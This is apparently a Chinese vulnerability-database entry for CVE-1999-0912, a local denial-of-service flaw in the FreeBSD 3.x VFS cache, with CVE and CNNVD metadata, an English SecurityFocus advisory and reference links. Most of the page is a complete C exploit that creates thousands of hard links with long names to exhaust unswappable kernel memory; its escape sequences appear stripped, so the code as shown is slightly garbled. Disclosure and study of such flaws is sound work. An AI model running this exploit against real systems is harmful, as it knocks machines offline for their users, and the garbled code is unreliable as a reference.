FreeBSD vfs_cache拒绝服务漏洞

FreeBSD vfs_cache拒绝服务漏洞

漏洞ID 1105546 漏洞类型 未知
发布时间 1999-09-22 更新时间 2005-05-02
图片[1]-FreeBSD vfs_cache拒绝服务漏洞-安全小百科CVE编号 CVE-1999-0912
图片[2]-FreeBSD vfs_cache拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-199909-040
漏洞平台 FreeBSD CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/19505
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-040
|漏洞详情
FreeBSDVFScache(vfs_cache)中存在漏洞。本地用户通过打开大量的文件导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/653/info

A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out).

FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code. 

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

#define	NFILE	64
#define	NLINK	30000
#define	NCHAR	245

int
main()
{
	char junk[NCHAR+1],
	     dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1];
	int i, j;
	struct stat sb;

	memset(junk, 'x', NCHAR);
	junk[NCHAR] = '';
	for (i = 0; i < NFILE; i++) {
		printf("r%02d/%05d...", i, 0),
		fflush(stdout);
		sprintf(dir, "%02d-%02d", i, 0);
		if (mkdir(dir, 0755) < 0)
			fprintf(stderr, "mkdir(%s) failedn", dir),
			exit(1);
		sprintf(file1, "%s/%s%03d", dir, junk, 0);
		if (creat(file1, 0644) < 0)
			fprintf(stderr, "creat(%s) failedn", file1),
			exit(1);
		if (stat(file1, &sb) < 0)
			fprintf(stderr, "stat(%s) failedn", file1),
			exit(1);
		for (j = 1; j < NLINK; j++) {
			if ((j % 1000) == 0) {
				printf("r%02d/%05d...", i, j),
				fflush(stdout);
				sprintf(dir, "%02d-%02d", i, j/1000);
				if (mkdir(dir, 0755) < 0)
					fprintf(stderr, "mkdir(%s) failedn", dir),
					exit(1);
			}
			sprintf(file2, "%s/%s%03d", dir, junk, j%1000);
			if (link(file1, file2) < 0)
				fprintf(stderr, "link(%s,%s) failedn", file1, file2),
				exit(1);
			if (stat(file2, &sb) < 0)
				fprintf(stderr, "stat(%s) failedn", file2),
				exit(1);
		}
	}
	printf("rfinished successfullyn");
}
|参考资料

来源:BID
名称:653
链接:http://www.securityfocus.com/bid/653
来源:OSVDB
名称:1079
链接:http://www.osvdb.org/1079

相关推荐: PHPMyAdmin Multiple Local File Include Vulnerabilities

PHPMyAdmin Multiple Local File Include Vulnerabilities 漏洞ID 1097060 漏洞类型 Input Validation Error 发布时间 2005-02-24 更新时间 2005-02-24 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享